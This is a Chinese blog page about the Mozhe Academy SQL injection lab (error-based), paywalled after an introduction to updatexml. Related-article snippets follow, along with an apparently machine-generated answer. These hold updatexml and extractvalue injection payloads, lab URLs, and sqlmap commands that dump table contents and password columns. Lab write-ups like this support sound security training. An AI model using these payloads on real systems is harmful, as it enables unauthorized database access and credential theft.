墨者学院-SQL注入漏洞测试(报错盲注)

最新推荐文章于 2024-05-02 17:48:59 发布
原创 最新推荐文章于 2024-05-02 17:48:59 发布 · 2.1k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web安全

启动靶场正常访问:

随便输入账号和密码:

并没有发现什么可用的信息

点击查看公告:

可以看到详细的公告哈!我们看看能不能在公告上做文章。

/new_list.php?id=1 and 1=1

 在我以为可以直接注入的时候,我发现1=2的时候也能正常显示哈!!!

然后在找闭合的时候,发现数据库报错的信息会显示出来。所以我们可以利用数据库报错展示出我们想要的数据。

开始注入:

        updatexml函数错误 

updatexml('XML_document','Xpath_string','New_value')
//即
updatexml('目标xml文件名','在xml中
最低0.47元/天 解锁文章
墨者学院-SQL注入漏洞测试报错
weixin_42939822的博客
03-30 5380
墨者学院-SQL注入漏洞测试报错
墨者-SQL注入漏洞测试(报错)
wh1sper、的博客
07-04 942
墨者-SQL注入漏洞测试前言一、sqlmap二、手1.报错注入2.时间注入3.联合查询union被过滤总结 前言 本题为墨者学院在线靶场 进入题目发现是个登录界面,找了好久,最后在关于平台停机维护的通知的页面找到了注入点 判断注入类型,当输入?id=1’ and 1=1 %23时,页面显示正常。 ?id=1' and 1=1 %23 当输入?id=1’ and 1=2 %23时,页面显示不正常。 由此判断注入类型为单字符注入。 一、sqlmap 首先先清理sqlmap的缓存。 python sq
墨者学院-SQL注入漏洞测试(布尔)
JimWu的博客
09-04 2798
SQL注入漏洞测试(布尔) 难易程度:★ 题目类型:SQL注入 使用工具:FireFox浏览器、kali 1.打开靶场,寻找注入点。 点击公告/new_list.php?id=1,找到注入点。 2.输入id=1’ and 1=1,返回空页面 输入id=1 and 1=1,返回正常页面。 3.判断数据库名字的长度,输入id=1 and length(database())=1,返回空白页,证...
墨者学院SQL注入漏洞测试(报错
xiaoduu的博客
03-31 944
手动注入方式 https://www.mozhe.cn/bug/detail/Ri9CaDcwWVl3Wi81bDh3Ulp0bGhOUT09bW96aGUmozhe 用到方法substr()、updatexml() 可以用的方法:sqlmap工具、手动注入 思路: 找到注入点 通过注入点查看哪里可以替换SQL语句 找到对应的版本数据库信息 获取数据 1、找到注入点(在管理台页面按...
墨者靶场 SQL注入漏洞测试(报错)通关思路
zyh1588的博客
11-01 806
小白回顾墨者靶场之sql报错注入
墨者学院——SQL注入漏洞测试(POST)
2303_76679642的博客
04-23 878
6.找字段内容“sqlmap -r post.txt --level 5 --risk 3 -D 数据库名 -T 数据表名 -C (字段1,字段2,....) --dump --dbms mysql --batch”5.找数据库表里面的字段“sqlmap -r post.txt --level 5 --risk 3 -D 数据库名 -T 数据表名 --columns --dbms mysql --batch”测试环境为Kali Linux。
墨者靶场------SQL注入漏洞测试(报错)
qq_43590351的博客
01-20 999
SQL注入漏洞测试(报错) 自己构造请求参数,然后数据库返回错误的信息,以至于我们能够爆出我们想要的信息 要进行SQL报错注入,首先要了解MySQL的几个函数 (1)concat 用来连接字符串 select concat('m','y','s','q','l')   执行结果为mysql (2)updatexml 第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法
0x31.SQL注入漏洞测试(报错)
qq_31679787的博客
11-15 222
使用单引号测试发现页面会输出报错信息,所以可以使用报错注入; 通过updatexml函数进行报错注入; 爆数据库; 爆表名; 爆列名; 爆数据; md5解密后得到登录得到key; ...
SQL注入漏洞测试(报错)
qq_52718293的博客
12-11 3232
1.判断注入类型 id=1 回显正常 id=1’ and 1=1-- - 回显正常 id=1’ and 1=2-- - 回显错误 因此,判断为单字符注入 2.由于题目是报错所以我们可以尝试使用报错注入的函数尝试爆库名 http://219.153.49.228:43578/new_list.php?id=1’ and extractvalue(1,concat(’~’,(select database())))-- - 2.ok,接着爆表名 http://219.153.49.228:435
刷题笔记:SQL注入漏洞测试(报错)
m0_67399862的博客
05-21 508
只用and 1=2页面正常,没有报错,但在id=1后加’,会发现页面报错,说明‘与前面的’闭合了 可考虑用报错 运用id=1' and extractvalue(1,concat(0x7e,database()))) --+语句来查询数据库名,即stormgroup 运用id=1' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema...
墨者——SQL注入漏洞测试(报错)
weixin_63082823的博客
10-11 199
意这个结果不完整噢,你拿去md5解密发现解不出来,数了数发现只有24位!这是因为**extractvalue函数一次只能查询32位长度**,但是吧你只求密码发现怎么样都是只有31位——
SQL注入报错墨者学院
waxcj的博客
05-02 3354
首先我们先来了解一下报错注入的基本概念 1:报错注入定义 报错注入就是利用了数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。 2:报错注入前提 页面上没有回显点,但是必须有SQL语句执行错误的信息。 3:报错注入优缺点 优点:不需要显示位,如果有显示位建议使用union联合查询。 缺点:需要有SQL语句的报错信息。 4:构造报错注入的基本步骤 构造目标查询语句 选择报错注入函数 构造报错注入语句 拼接报错注入语句 5:常见的报错注入函数 updatexml(
SQL注入漏洞测试(报错)笔记
BEGCCYD的博客
06-26 1805
这个是今天拿下的靶场,这是我作为小白学习的第二个靶场,做一下笔记 已知IP地址为:219.153.49.228,端口号为41280,访问了之后是下面的页面 看到这个页面之后,我进入了后台,查看之后知道了加new_list.php?id=1进行测试看是否有注入点 输入之后页面显示如下 接下来我输入’显示说明存在注入点 所以可以开始进行爆库了,输入http://219.153.49.228:41280/new_list.php?id=1%27%20and%20updatexml(1,concat(0x7e
SQL报错
weixin_30594001的博客
04-14 410
嗯哼,这几天篮球比赛,天天训练,学习都耽搁了,DDCTF做了一会心态就爆炸了,蓝瘦,明天再打一场,希望能赢呢,打完就疯狂继续学习了。今天抽空又做了一些基本的SQL注入题目,墨者学院的一道报错注入的题目,很基础。并且没过滤啥,所以直接肝就完事了。我一开始用了SQLMAP就直接跑了,然后还是锻炼一下手把。 首先,还是那个页面(最近又用起了火狐,毕竟比Chrome 占用资源少,卡顿少) 然后加...
墨者学院11 SQL注入漏洞测试(报错)
weixin_42789937的博客
02-21 517
墨者学院11 SQL注入漏洞测试(报错),相比之前流程一致,使用updatexml()语句查询~
墨者 SQL注入漏洞测试(报错)
weixin_50847719的博客
02-09 440
看一下源代码,找到sql注入点 <a href="new_list.php?id=1" target="_blank">关于平台停机维护的通知【12:02】</a></p> 先尝试直接在后面加and 1=2 没用然后试一试http://219.153.49.228:40662/new_list.php?id=1’ 说明是‘’单引号 extractvalue() updatexml()报错注入: extractvalue() :对XML文档进行查询的函数 concat
墨者SQL注入漏洞测试(报错)
wswr的博客
03-17 467
思路:找注入点,然后发现还是老地方,然后用 and 1=1 和 and 1=2 结果都一样,猜测应是and被过滤了,然后是用 单引号发现报错,说明注入点就在这,根据题目 报错注入,那么注入的流程就很显而易见了 首先是要知道报错注入时用的语句 ' and updatexml(1,concat(0x7e,(X),0x7e),1)--+ 【0x7e 其实指的就是~,在这里其实是可以随便换的,深入了解报错函数原理的话 SQL字符型注入(get)-利用updatexml函数-报错注入 - 知乎】 X就是平时
SQL注入漏洞--报错/union/布尔/时间
嘿嘿嘿
05-02 1852
之前介绍了数据库的基本操作,今天这篇文章就来实操SQL注入。阅读本文前可以先看一下基本操作,有助于更换理解。。。
墨者靶场sql注入漏洞测试布尔
最新发布
10-24
墨者靶场进行 SQL 注入漏洞测试(布尔),可按以下步骤操作: 1. **环境探查与漏洞初筛**:进入靶场环境找到后台管理页面,先尝试弱口令和万能密码,若失败则抓包查看登陆处是否存在注入漏洞。若未发现,仔细查看页面寻找新链接,点击跳转后若怀疑存在注入漏洞,可构造特定 URL 进行测试,以确认是否为数字型 SQL 注入漏洞。例如构造 `http://219.153.49.228:41979/new_list.php?id=1` 查看是否有回显,再构造 `http://219.153.49.228:41979/new_list.php?id=1'` 查看是否无回显,还可构造 `http://219.153.49.228:41979/new_list.php?id=1 and 1=1` 和 `http://219.153.49.228:41979/new_list.php?id=1 and 1=2` 分别查看有无回显来判断 [^1]。 2. **手动判断数据库信息** - **判断数据库名长度**:若未找到回显位,可尝试布尔型注入。如输入 `id=1 and length(database())=1`,根据返回页面是否空白判断长度是否为 1,逐个尝试确定数据库名长度 [^4]。 - **判断数据库名**:确定长度后,输入 `id=1 and substr(database(),1,1)='a' --+`,根据返回页面情况确定数据库名的第一个字符,依此类推确定整个数据库名 [^4]。 3. **使用 sqlmap 自动化操作** - **检测注入并获取数据库信息**:使用命令 `sqlmap -u <目标 URL>` 进行注入检测。若要获取数据库列表,可使用 `python2 sqlmap.py -u <目标 URL> -technique=B --dbs` 或 `sqlmap.py -u <目标 URL> --dbs` [^1][^2][^3][^4]。 - **获取数据库中的表**:确定数据库名(如 `stormgroup`)后,使用 `python2 sqlmap.py -u <目标 URL> -technique=B -D=<数据库名> --tables` 或 `sqlmap.py -u <目标 URL> -D <数据库名> --tables` 获取表名 [^1][^2][^4]。 - **获取表中的列**:使用 `python2 sqlmap.py -u <目标 URL> -technique=B -D <数据库名> -T <表名> --columns` 或 `sqlmap.py -u <目标 URL> -D <数据库名> -T <表名> --columns` 获取列名 [^1][^2][^4]。 - **获取表中的内容**:使用 `python2 sqlmap.py -u <目标 URL> -technique=B -D <数据库名> -T <表名> -C <列名> --dump` 或 `sqlmap.py -u <目标 URL> -D <数据库名> -T <表名> -C <列名> --dump` 获取指定列的内容 [^2][^4]。 4. **后续处理**:获取到加密的密码等信息后,可找网站进行 MD5 解密,然后使用解密后的信息尝试登录,获取 key [^1][^2][^4]。 ### 示例代码 ```bash # 使用 sqlmap 检测注入并获取数据库列表 sqlmap -u http://219.153.49.228:41979/new_list.php?id=1 --dbs # 获取指定数据库中的表 sqlmap -u http://219.153.49.228:41979/new_list.php?id=1 -D stormgroup --tables # 获取指定表中的列 sqlmap -u http://219.153.49.228:41979/new_list.php?id=1 -D stormgroup -T member --columns # 获取指定列的内容 sqlmap -u http://219.153.49.228:41979/new_list.php?id=1 -D stormgroup -T member -C name,password --dump ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值